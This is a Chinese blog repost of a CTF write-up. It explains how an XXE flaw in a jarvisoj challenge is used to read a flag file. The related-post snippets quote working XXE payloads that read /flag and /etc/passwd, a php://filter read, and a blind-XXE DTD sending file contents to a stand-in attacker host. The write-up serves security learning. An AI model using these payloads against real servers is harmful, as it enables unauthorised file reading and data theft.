一道CTF针对XXE漏洞的练习

最新推荐文章于 2024-06-03 22:01:18 发布
最新推荐文章于 2024-06-03 22:01:18 发布
阅读量2.1k 收藏 2
点赞数
原文链接:http://www.cnblogs.com/-chenxs/p/11374614.html
版权

题目链接:http://web.jarvisoj.com:9882/

目的很明确获取/home/ctf/flag.txt的内容

一般读取目标机的本地文件都会用到file协议。

思路:

那么思路一:文件包含;

思路二:ssrf漏洞,这个成功率不大;

思路三:xxe漏洞,再没看源码的情况下试了一下,发现可以。

验证:

访问题目链接

随便输入,输入url发现都没有什么回显或者跳转

那么直接burp抓包

我们把content-type改成application/xml的类型,然后下方就可以写入xml代码,先用dtd内部注入看一下能执行不

发现可以成功执行,外部实体注入的话这里没有服务器,不能够测试,那么直接外部注入看是否成功

发现可以读取文件,那么直接读取home/ctf/flag.txt内容

flag读取成功!

 也可进行源码分析

 

发现是AJAX异步传送数据
在一般的异步网站都会有异步数据与服务器的交互,一般传送数据为json但如果将传送的数据格式改为xml。有很大的可能服务器会解析你异步上传的xml脚本执行想要干的事。

转载于:https://www.cnblogs.com/-chenxs/p/11374614.html

bamanju0574
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞学习之CTF
qq_46085232的博客
04-09 458
两道有关XXECTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
CTF学习笔记之XXE
克格莫
07-08 1123
一直对XXE理解不是很深入,今天仔细研究一下XXE以及CTF里面的XXE题型 0x00 XML基本格式 XML 文档有自己的一个格式规范,这个格式规范是由 DTD控制的。文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 带有 DTD 的 XML 文档实例: <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (
XXE漏洞学习——基础学习(ctfshow—web373)
最新发布
m0_73756016的博客
06-03 826
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。
CTF-[XXE学习记录]
qq_53142368的博客
06-07 1003
1.XXE 关于xml我就不详细说了,想看的话从我之前的文章找找,有关于xml的概念和怎么构造。 XML的设计宗旨是传输数据,而非显示数据。XML是不作为的,XML是不会做任何事情,XML 被设计用来结构化、存储以及传输信息。 XML是纯文本,且允许创作者定义自己的标签和文档结构,是独立于软件和硬件的信息传输工具。 0x01.DTD 文档类型定义(DTD)可定义合法的XML文档构建模块,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 1.内部的DOCTYPE声明 假如DTD被包含在XML源
CTFxxe
qq_37410729的博客
10-26 1786
xxe漏洞即我们可以进行外部实体注入,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 两个writeup 第一题: bp抓包 然后就可以进行xml注入了 这是两种xxe,我们先试第二种(因为源代码并没有标注flag在什么文件中) 然后进内网 然而并进不去,那就只能找存活主机了。 直接暴力寻找 第二题: 按照上题的思路走 但是并没有找到flag。。。。 最后只能去文件里找了,但是题目没有标明具体flag在那个文件,只能试一下/flag文
XXE外部实体注入漏洞之——CTF考题补充与——及XXE漏洞修复
温柔小薛的博客
04-12 1094
CTF考题 测试及漏洞修复 扩展考题 jarvisoj 上的一道题目 API 调用 这道题的题目说明是 请设法获得目标机器/home/ctf/flag.txt 中的 flag 值。 进入题目 http://web.jarvisoj.com:9882/ 发现一个输入框,我们对其进行抓包 是一个 json 数据提交,修改数据发现可以被解析 这是一道 xxe 的题,怎么获取 flag?只要将 jso...
ctf网络安全攻防练习
12-04
CTF(Capture The Flag)是网络安全领域中一种流行的竞赛形式,它将攻防技术融入到竞技游戏中,参赛者通过解密、逆向工程、漏洞挖掘等多种技能来获取“旗标”(Flag),从而得分。这种活动有助于提升参与者在真实...
逆向分析漏洞例子ctf
10-19
逆向分析漏洞例子ctf
CTF-入门练习
10-30
这个“CTF-入门练习题”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防是CTF中的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
CTF 夺旗-JAVA 考点反编译&XXE&反序列化#Java 常考点及出题思路考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等设法间
一天一道ctf 第40天(xxe注入)
scrawman的博客
07-21 216
[NCTF2019]True XML cookbook 这道题是xml模板和xxe注入,以前没有碰到过类似知识点所以这次学习一下。 填写用户名,抓包,改包。简单来说就是把file协议读取的内容放在abc这个变量里,然后<username>&abc</username>输出abc的值。 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY abc SYSTEM "file:///e
CTFSHOW xxe
羽的博客
01-11 3267
web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64
CTF-XXE(持续更新,欢迎分享更多相关知识点的题目)
m0_74317362的博客
08-28 1377
进来看到然后一起看。
CTFSHOW—XXE
灰太的表格的博客
01-31 414
(睡了一下午打算,通宵学习hhhh) web373 wa1ki0g标签可以随便改,ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>
XXE注入
a3320315的博客
10-28 547
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
【web-ctfctf-pikachu-xxe
一个努力生活的人的博客
08-23 247
ctf-pikachu-xxe
XXE CTF题目
草儿也忧伤的博客
05-14 1857
** XXE CTF题目 **https://www.jianshu.com/p/68d8ae78cc45 直接点链接看吧
ctf文件包含漏洞题目
10-14
好的,关于ctf文件包含漏洞题目,我可以给你一些简单的解释和例子。 ctf文件包含漏洞是指在程序中存在文件包含功能,但是由于没有对用户输入进行过滤或者限制,导致攻击者可以通过构造恶意输入来读取、执行或者删除...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值